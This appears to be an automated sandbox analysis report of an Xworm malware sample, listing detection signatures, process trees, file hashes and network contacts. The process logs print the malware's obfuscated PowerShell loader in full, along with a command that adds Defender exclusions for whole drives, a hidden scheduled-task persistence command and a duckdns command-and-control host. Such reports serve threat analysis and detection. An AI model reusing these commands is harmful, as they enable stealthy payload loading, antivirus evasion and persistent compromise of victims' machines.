Analysis Overview
SHA256
2d22aad1f20e40c0a557741d6366ec2f61bc505ca491672d240b233079c9a70c
Threat Level: Known bad
The file 2d22aad1f20e40c0a557741d6366ec2f61bc505ca491672d240b233079c9a70c was found to be: Known bad.
Malicious Activity Summary
Detect Xworm Payload
Xworm
Blocklisted process makes network request
Command and Scripting Interpreter: PowerShell
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Suspicious use of SetWindowsHookEx
MITRE ATT&CK Matrix V13
Analysis: static1
Detonation Overview
Reported
2024-06-11 23:33
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-11 23:33
Reported
2024-06-11 23:36
Platform
win7-20240215-en
Max time kernel
121s
Max time network
125s
Command Line
Signatures
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1888 wrote to memory of 3040 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe |
| PID 1888 wrote to memory of 3040 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe |
| PID 1888 wrote to memory of 3040 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe |
| PID 3040 wrote to memory of 2520 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe |
| PID 3040 wrote to memory of 2520 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe |
| PID 3040 wrote to memory of 2520 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe |
| PID 3040 wrote to memory of 2556 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 3040 wrote to memory of 2556 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 3040 wrote to memory of 2556 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\F30585602117611871915843120891316949139984.cmd"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\F30585602117611871915843120891316949139984.cmd
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\F30585602117611871915843120891316949139984.cmd';$QVHA='CfvRoopfvRoyTfvRoofvRo'.Replace('fvRo', ''),'MakCkDinkCkDMkCkDodkCkDulekCkD'.Replace('kCkD', ''),'GejDtwtCujDtwrrjDtwenjDtwtPjDtwrojDtwcesjDtwsjDtw'.Replace('jDtw', ''),'CrJoSTeJoSTatJoSTeDJoSTeJoSTcJoSTryJoSTpJoSTtoJoSTrJoST'.Replace('JoST', ''),'STPOBpTPOBliTPOBtTPOB'.Replace('TPOB', ''),'DyvWFecyvWFomyvWFpreyvWFsyvWFsyvWF'.Replace('yvWF', ''),'ChaPahEngePahEEPahExtePahEnPahEsioPahEnPahE'.Replace('PahE', ''),'ElePJDLmePJDLntPJDLAPJDLtPJDL'.Replace('PJDL', ''),'EntADZAryADZAPoADZAinADZAtADZA'.Replace('ADZA', ''),'TralECtnslECtflECtolECtrmlECtFilECtnalECtlBlECtlolECtcklECt'.Replace('lECt', ''),'FmBZfrmBZfommBZfBmBZfamBZfsemBZf64SmBZftrmBZfinmBZfgmBZf'.Replace('mBZf', ''),'ReNkCJadNkCJLiNkCJnesNkCJ'.Replace('NkCJ', ''),'InIpSVvoIpSVkeIpSV'.Replace('IpSV', ''),'LSLFPoaSLFPdSLFP'.Replace('SLFP', '');powershell -w hidden;function XEpjb($SsIUN){$RwiqM=[System.Security.Cryptography.Aes]::Create();$RwiqM.Mode=[System.Security.Cryptography.CipherMode]::CBC;$RwiqM.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$RwiqM.Key=[System.Convert]::($QVHA[10])('S3B4J2w42TOnytzqhDJwxtrTIKtriJl/AzoEsA6j1cQ=');$RwiqM.IV=[System.Convert]::($QVHA[10])('0ieVmLktmIvfx4l5/K4RAw==');$wFkLg=$RwiqM.($QVHA[3])();$CJXNR=$wFkLg.($QVHA[9])($SsIUN,0,$SsIUN.Length);$wFkLg.Dispose();$RwiqM.Dispose();$CJXNR;}function ZqMTM($SsIUN){$SbGLz=New-Object System.IO.MemoryStream(,$SsIUN);$qsYcG=New-Object System.IO.MemoryStream;$dzWih=New-Object System.IO.Compression.GZipStream($SbGLz,[IO.Compression.CompressionMode]::($QVHA[5]));$dzWih.($QVHA[0])($qsYcG);$dzWih.Dispose();$SbGLz.Dispose();$qsYcG.Dispose();$qsYcG.ToArray();}$gBYoC=[System.IO.File]::($QVHA[11])([Console]::Title);$nEynS=ZqMTM (XEpjb ([Convert]::($QVHA[10])([System.Linq.Enumerable]::($QVHA[7])($gBYoC, 5).Substring(2))));$FPzIN=ZqMTM (XEpjb ([Convert]::($QVHA[10])([System.Linq.Enumerable]::($QVHA[7])($gBYoC, 6).Substring(2))));[System.Reflection.Assembly]::($QVHA[13])([byte[]]$FPzIN).($QVHA[8]).($QVHA[12])($null,$null);[System.Reflection.Assembly]::($QVHA[13])([byte[]]$nEynS).($QVHA[8]).($QVHA[12])($null,$null); "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Network
Files
memory/2556-4-0x000007FEF605E000-0x000007FEF605F000-memory.dmp
memory/2556-5-0x000000001B7B0000-0x000000001BA92000-memory.dmp
memory/2556-6-0x00000000022C0000-0x00000000022C8000-memory.dmp
memory/2556-7-0x000007FEF5DA0000-0x000007FEF673D000-memory.dmp
memory/2556-8-0x000007FEF5DA0000-0x000007FEF673D000-memory.dmp
memory/2556-9-0x000007FEF5DA0000-0x000007FEF673D000-memory.dmp
memory/2556-10-0x000007FEF5DA0000-0x000007FEF673D000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-11 23:33
Reported
2024-06-11 23:36
Platform
win10v2004-20240426-en
Max time kernel
135s
Max time network
151s
Command Line
Signatures
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Xworm
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\F30585602117611871915843120891316949139984.cmd"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\F30585602117611871915843120891316949139984.cmd
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\F30585602117611871915843120891316949139984.cmd';$QVHA='CfvRoopfvRoyTfvRoofvRo'.Replace('fvRo', ''),'MakCkDinkCkDMkCkDodkCkDulekCkD'.Replace('kCkD', ''),'GejDtwtCujDtwrrjDtwenjDtwtPjDtwrojDtwcesjDtwsjDtw'.Replace('jDtw', ''),'CrJoSTeJoSTatJoSTeDJoSTeJoSTcJoSTryJoSTpJoSTtoJoSTrJoST'.Replace('JoST', ''),'STPOBpTPOBliTPOBtTPOB'.Replace('TPOB', ''),'DyvWFecyvWFomyvWFpreyvWFsyvWFsyvWF'.Replace('yvWF', ''),'ChaPahEngePahEEPahExtePahEnPahEsioPahEnPahE'.Replace('PahE', ''),'ElePJDLmePJDLntPJDLAPJDLtPJDL'.Replace('PJDL', ''),'EntADZAryADZAPoADZAinADZAtADZA'.Replace('ADZA', ''),'TralECtnslECtflECtolECtrmlECtFilECtnalECtlBlECtlolECtcklECt'.Replace('lECt', ''),'FmBZfrmBZfommBZfBmBZfamBZfsemBZf64SmBZftrmBZfinmBZfgmBZf'.Replace('mBZf', ''),'ReNkCJadNkCJLiNkCJnesNkCJ'.Replace('NkCJ', ''),'InIpSVvoIpSVkeIpSV'.Replace('IpSV', ''),'LSLFPoaSLFPdSLFP'.Replace('SLFP', '');powershell -w hidden;function XEpjb($SsIUN){$RwiqM=[System.Security.Cryptography.Aes]::Create();$RwiqM.Mode=[System.Security.Cryptography.CipherMode]::CBC;$RwiqM.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$RwiqM.Key=[System.Convert]::($QVHA[10])('S3B4J2w42TOnytzqhDJwxtrTIKtriJl/AzoEsA6j1cQ=');$RwiqM.IV=[System.Convert]::($QVHA[10])('0ieVmLktmIvfx4l5/K4RAw==');$wFkLg=$RwiqM.($QVHA[3])();$CJXNR=$wFkLg.($QVHA[9])($SsIUN,0,$SsIUN.Length);$wFkLg.Dispose();$RwiqM.Dispose();$CJXNR;}function ZqMTM($SsIUN){$SbGLz=New-Object System.IO.MemoryStream(,$SsIUN);$qsYcG=New-Object System.IO.MemoryStream;$dzWih=New-Object System.IO.Compression.GZipStream($SbGLz,[IO.Compression.CompressionMode]::($QVHA[5]));$dzWih.($QVHA[0])($qsYcG);$dzWih.Dispose();$SbGLz.Dispose();$qsYcG.Dispose();$qsYcG.ToArray();}$gBYoC=[System.IO.File]::($QVHA[11])([Console]::Title);$nEynS=ZqMTM (XEpjb ([Convert]::($QVHA[10])([System.Linq.Enumerable]::($QVHA[7])($gBYoC, 5).Substring(2))));$FPzIN=ZqMTM (XEpjb ([Convert]::($QVHA[10])([System.Linq.Enumerable]::($QVHA[7])($gBYoC, 6).Substring(2))));[System.Reflection.Assembly]::($QVHA[13])([byte[]]$FPzIN).($QVHA[8]).($QVHA[12])($null,$null);[System.Reflection.Assembly]::($QVHA[13])([byte[]]$nEynS).($QVHA[8]).($QVHA[12])($null,$null); "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\','F:\')
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\F30585602117611871915843120891316949139984')
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 8009' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\SC3.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Roaming\SC3.cmd"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Roaming\SC3.cmd"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Roaming\SC3.cmd';$QVHA='CfvRoopfvRoyTfvRoofvRo'.Replace('fvRo', ''),'MakCkDinkCkDMkCkDodkCkDulekCkD'.Replace('kCkD', ''),'GejDtwtCujDtwrrjDtwenjDtwtPjDtwrojDtwcesjDtwsjDtw'.Replace('jDtw', ''),'CrJoSTeJoSTatJoSTeDJoSTeJoSTcJoSTryJoSTpJoSTtoJoSTrJoST'.Replace('JoST', ''),'STPOBpTPOBliTPOBtTPOB'.Replace('TPOB', ''),'DyvWFecyvWFomyvWFpreyvWFsyvWFsyvWF'.Replace('yvWF', ''),'ChaPahEngePahEEPahExtePahEnPahEsioPahEnPahE'.Replace('PahE', ''),'ElePJDLmePJDLntPJDLAPJDLtPJDL'.Replace('PJDL', ''),'EntADZAryADZAPoADZAinADZAtADZA'.Replace('ADZA', ''),'TralECtnslECtflECtolECtrmlECtFilECtnalECtlBlECtlolECtcklECt'.Replace('lECt', ''),'FmBZfrmBZfommBZfBmBZfamBZfsemBZf64SmBZftrmBZfinmBZfgmBZf'.Replace('mBZf', ''),'ReNkCJadNkCJLiNkCJnesNkCJ'.Replace('NkCJ', ''),'InIpSVvoIpSVkeIpSV'.Replace('IpSV', ''),'LSLFPoaSLFPdSLFP'.Replace('SLFP', '');powershell -w hidden;function XEpjb($SsIUN){$RwiqM=[System.Security.Cryptography.Aes]::Create();$RwiqM.Mode=[System.Security.Cryptography.CipherMode]::CBC;$RwiqM.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$RwiqM.Key=[System.Convert]::($QVHA[10])('S3B4J2w42TOnytzqhDJwxtrTIKtriJl/AzoEsA6j1cQ=');$RwiqM.IV=[System.Convert]::($QVHA[10])('0ieVmLktmIvfx4l5/K4RAw==');$wFkLg=$RwiqM.($QVHA[3])();$CJXNR=$wFkLg.($QVHA[9])($SsIUN,0,$SsIUN.Length);$wFkLg.Dispose();$RwiqM.Dispose();$CJXNR;}function ZqMTM($SsIUN){$SbGLz=New-Object System.IO.MemoryStream(,$SsIUN);$qsYcG=New-Object System.IO.MemoryStream;$dzWih=New-Object System.IO.Compression.GZipStream($SbGLz,[IO.Compression.CompressionMode]::($QVHA[5]));$dzWih.($QVHA[0])($qsYcG);$dzWih.Dispose();$SbGLz.Dispose();$qsYcG.Dispose();$qsYcG.ToArray();}$gBYoC=[System.IO.File]::($QVHA[11])([Console]::Title);$nEynS=ZqMTM (XEpjb ([Convert]::($QVHA[10])([System.Linq.Enumerable]::($QVHA[7])($gBYoC, 5).Substring(2))));$FPzIN=ZqMTM (XEpjb ([Convert]::($QVHA[10])([System.Linq.Enumerable]::($QVHA[7])($gBYoC, 6).Substring(2))));[System.Reflection.Assembly]::($QVHA[13])([byte[]]$FPzIN).($QVHA[8]).($QVHA[12])($null,$null);[System.Reflection.Assembly]::($QVHA[13])([byte[]]$nEynS).($QVHA[8]).($QVHA[12])($null,$null); "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\','F:\')
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Roaming\SC3')
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 8009' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\SC3.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 2.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 138.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ivmsgauzt84tgksuw6an6cht0am8iiux0jz.duckdns.org | udp |
| CO | 186.169.73.205:7772 | ivmsgauzt84tgksuw6an6cht0am8iiux0jz.duckdns.org | tcp |
| US | 8.8.8.8:53 | 205.73.169.186.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ivmsgauzt84tgksuw6an6cht0am8iiux0jz.duckdns.org | udp |
| CO | 186.169.73.205:7772 | ivmsgauzt84tgksuw6an6cht0am8iiux0jz.duckdns.org | tcp |
Files
memory/3396-0-0x00007FF9335B3000-0x00007FF9335B5000-memory.dmp
memory/3396-7-0x0000016A2F5B0000-0x0000016A2F5D2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vibvto4n.5el.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3396-11-0x00007FF9335B0000-0x00007FF934071000-memory.dmp
memory/3396-12-0x00007FF9335B0000-0x00007FF934071000-memory.dmp
memory/3396-13-0x0000016A48860000-0x0000016A488A4000-memory.dmp
memory/3396-14-0x0000016A488B0000-0x0000016A48926000-memory.dmp
memory/1636-24-0x00007FF9335B0000-0x00007FF934071000-memory.dmp
memory/1636-25-0x00007FF9335B0000-0x00007FF934071000-memory.dmp
memory/1636-26-0x00007FF9335B0000-0x00007FF934071000-memory.dmp
memory/1636-29-0x00007FF9335B0000-0x00007FF934071000-memory.dmp
memory/3396-30-0x0000016A485E0000-0x0000016A485F2000-memory.dmp
memory/3396-31-0x00007FF951450000-0x00007FF951645000-memory.dmp
memory/3396-32-0x00007FF94FE70000-0x00007FF94FF2E000-memory.dmp
memory/3396-33-0x0000016A485F0000-0x0000016A48610000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 3f01549ee3e4c18244797530b588dad9 |
| SHA1 | 3e87863fc06995fe4b741357c68931221d6cc0b9 |
| SHA256 | 36b51e575810b6af6fc5e778ce0f228bc7797cd3224839b00829ca166fa13f9a |
| SHA512 | 73843215228865a4186ac3709bf2896f0f68da0ba3601cc20226203dd429a2ad9817b904a45f6b0456b8be68deebf3b011742a923ce4a77c0c6f3a155522ab50 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | ecceac16628651c18879d836acfcb062 |
| SHA1 | 420502b3e5220a01586c59504e94aa1ee11982c9 |
| SHA256 | 58238de09a8817ed9f894ed8e5bf06a897fd08e0b0bd77e508d37b2598edd2a9 |
| SHA512 | be3c7cb529cafb00f58790a6f8b35c4ff6db9f7f43a507d2218fd80cebc88413e46f71b1bc35b8afcc36b68f9409c946470d1e74a4fe225400eeb6f3f898f5b3 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | d814b7411c2ac2f79b4d3a9cab93e141 |
| SHA1 | f8ca458a448feba152ccf735f8ec07442fb80a73 |
| SHA256 | 5100f85fcd8f613e5413d821cb16a70031b43089c2c60f0d8ae195e855112394 |
| SHA512 | 8e20b12f339c5a1cd03b50fbe8e3b280561d20f95ac3bed8e002152dd8661ccced67b7374e830b0d17e3e0ba39063007abbaafa2854726b7c55f40c06239f1cc |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
| MD5 | e4de99c1795fd54aa87da05fa39c199c |
| SHA1 | dfaaac2de1490fae01104f0a6853a9d8fe39a9d7 |
| SHA256 | 23c35f4fcd9f110592d3ff34490e261efbcf6c73aa753887479197fd15289457 |
| SHA512 | 796b6d3f7b9a336bc347eae8fb11cdbf2ae2ad73aae58de79e096c3ad57bd45eadddae445a95c4ee7452554568d7ab55b0307972b24e2ff75eae4a098ba9e926 |
C:\Users\Admin\AppData\Roaming\SC3.cmd
| MD5 | aebbb92d1f67cddf37f996695175153e |
| SHA1 | 8706b8f0d37fb05aa70f32d78c3d8469b64c7c27 |
| SHA256 | 2ad358d7ccdb651d4603cb591a2eb19416ed453a8cf19c82cb2717477db518a7 |
| SHA512 | 60e261b245fb23c75cd7fc0e507daa3e6f39f7f86261622ca90fd21dafda481abd0d80d7befe01ebe31a3f25485df298445662dfb8041fa0e607c85c31425ce6 |
memory/3508-92-0x00007FF94FE70000-0x00007FF94FF2E000-memory.dmp
memory/3508-91-0x00007FF951450000-0x00007FF951645000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | e4875d006129f4902a6892a3754d278d |
| SHA1 | 6a2c7ed12e062fcfed63f34c35441edf3444b8fa |
| SHA256 | 6a4d2d208032d4292f2ab0ef820a53cc33095b199cecf61b9239af4184a3a052 |
| SHA512 | d4a8de335c6933a201f8d46a89566d850b2b9364e058ae30b7113f30e2a7e544a8cf0aeb0bda990263798f5052afcc641609566458347d4f030c2ddead0a2ef3 |
memory/3396-104-0x00007FF9335B0000-0x00007FF934071000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 254f97caf20b39d0846821965f6c1d4b |
| SHA1 | 6b8492bf210551112d74fdba59c06e01e498959d |
| SHA256 | c6698a3842dfc6493ca85cda0e881bd077f928bf5d707c8db45b5bc2c4910569 |
| SHA512 | 9bc7e382d0597b7ba94d6a2447bfcfda5f6bd43dfcdee2e7796d7b527b4e99d68cc0f0a347668f07cc6aa25a63b1aa1b4d84c7abd4204ef64eee9b0b55e9dcc9 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 2c312978ff5c2b444b5667ba4c479f2a |
| SHA1 | 0910f579df9dbf6a9e0b8fc4c474d53fe9bc3f2f |
| SHA256 | 43c50ae17f6595ba2015900cbb8c415f9ce79fddacf97b7a2ce03b7f499bd5b0 |
| SHA512 | 2e51aea38fdc94fb7ab3bb39f9d6778c44b8e82fd97bb4249eda0207b5e2ce49d36512197661df7986ba014f62fab47f13bd3cfff9e6bf2de194d40c3524c3a8 |
memory/3508-127-0x00000127D85D0000-0x00000127D85E0000-memory.dmp
Analysis: behavioral3
Detonation Overview
Submitted
2024-06-11 23:33
Reported
2024-06-11 23:36
Platform
win7-20240419-en
Max time kernel
118s
Max time network
119s
Command Line
Signatures
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1936 wrote to memory of 2456 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe |
| PID 1936 wrote to memory of 2456 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe |
| PID 1936 wrote to memory of 2456 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe |
| PID 2456 wrote to memory of 1296 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe |
| PID 2456 wrote to memory of 1296 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe |
| PID 2456 wrote to memory of 1296 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe |
| PID 2456 wrote to memory of 2148 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2456 wrote to memory of 2148 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2456 wrote to memory of 2148 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\F30585602117611871915843120891316949139984.cmd"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\F30585602117611871915843120891316949139984.cmd
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\F30585602117611871915843120891316949139984.cmd';$QVHA='CfvRoopfvRoyTfvRoofvRo'.Replace('fvRo', ''),'MakCkDinkCkDMkCkDodkCkDulekCkD'.Replace('kCkD', ''),'GejDtwtCujDtwrrjDtwenjDtwtPjDtwrojDtwcesjDtwsjDtw'.Replace('jDtw', ''),'CrJoSTeJoSTatJoSTeDJoSTeJoSTcJoSTryJoSTpJoSTtoJoSTrJoST'.Replace('JoST', ''),'STPOBpTPOBliTPOBtTPOB'.Replace('TPOB', ''),'DyvWFecyvWFomyvWFpreyvWFsyvWFsyvWF'.Replace('yvWF', ''),'ChaPahEngePahEEPahExtePahEnPahEsioPahEnPahE'.Replace('PahE', ''),'ElePJDLmePJDLntPJDLAPJDLtPJDL'.Replace('PJDL', ''),'EntADZAryADZAPoADZAinADZAtADZA'.Replace('ADZA', ''),'TralECtnslECtflECtolECtrmlECtFilECtnalECtlBlECtlolECtcklECt'.Replace('lECt', ''),'FmBZfrmBZfommBZfBmBZfamBZfsemBZf64SmBZftrmBZfinmBZfgmBZf'.Replace('mBZf', ''),'ReNkCJadNkCJLiNkCJnesNkCJ'.Replace('NkCJ', ''),'InIpSVvoIpSVkeIpSV'.Replace('IpSV', ''),'LSLFPoaSLFPdSLFP'.Replace('SLFP', '');powershell -w hidden;function XEpjb($SsIUN){$RwiqM=[System.Security.Cryptography.Aes]::Create();$RwiqM.Mode=[System.Security.Cryptography.CipherMode]::CBC;$RwiqM.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$RwiqM.Key=[System.Convert]::($QVHA[10])('S3B4J2w42TOnytzqhDJwxtrTIKtriJl/AzoEsA6j1cQ=');$RwiqM.IV=[System.Convert]::($QVHA[10])('0ieVmLktmIvfx4l5/K4RAw==');$wFkLg=$RwiqM.($QVHA[3])();$CJXNR=$wFkLg.($QVHA[9])($SsIUN,0,$SsIUN.Length);$wFkLg.Dispose();$RwiqM.Dispose();$CJXNR;}function ZqMTM($SsIUN){$SbGLz=New-Object System.IO.MemoryStream(,$SsIUN);$qsYcG=New-Object System.IO.MemoryStream;$dzWih=New-Object System.IO.Compression.GZipStream($SbGLz,[IO.Compression.CompressionMode]::($QVHA[5]));$dzWih.($QVHA[0])($qsYcG);$dzWih.Dispose();$SbGLz.Dispose();$qsYcG.Dispose();$qsYcG.ToArray();}$gBYoC=[System.IO.File]::($QVHA[11])([Console]::Title);$nEynS=ZqMTM (XEpjb ([Convert]::($QVHA[10])([System.Linq.Enumerable]::($QVHA[7])($gBYoC, 5).Substring(2))));$FPzIN=ZqMTM (XEpjb ([Convert]::($QVHA[10])([System.Linq.Enumerable]::($QVHA[7])($gBYoC, 6).Substring(2))));[System.Reflection.Assembly]::($QVHA[13])([byte[]]$FPzIN).($QVHA[8]).($QVHA[12])($null,$null);[System.Reflection.Assembly]::($QVHA[13])([byte[]]$nEynS).($QVHA[8]).($QVHA[12])($null,$null); "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Network
Files
memory/2148-4-0x000007FEF5D5E000-0x000007FEF5D5F000-memory.dmp
memory/2148-5-0x000000001B7E0000-0x000000001BAC2000-memory.dmp
memory/2148-6-0x000007FEF5AA0000-0x000007FEF643D000-memory.dmp
memory/2148-8-0x000007FEF5AA0000-0x000007FEF643D000-memory.dmp
memory/2148-10-0x000007FEF5AA0000-0x000007FEF643D000-memory.dmp
memory/2148-7-0x0000000001FF0000-0x0000000001FF8000-memory.dmp
memory/2148-9-0x000007FEF5AA0000-0x000007FEF643D000-memory.dmp
memory/2148-11-0x000007FEF5AA0000-0x000007FEF643D000-memory.dmp
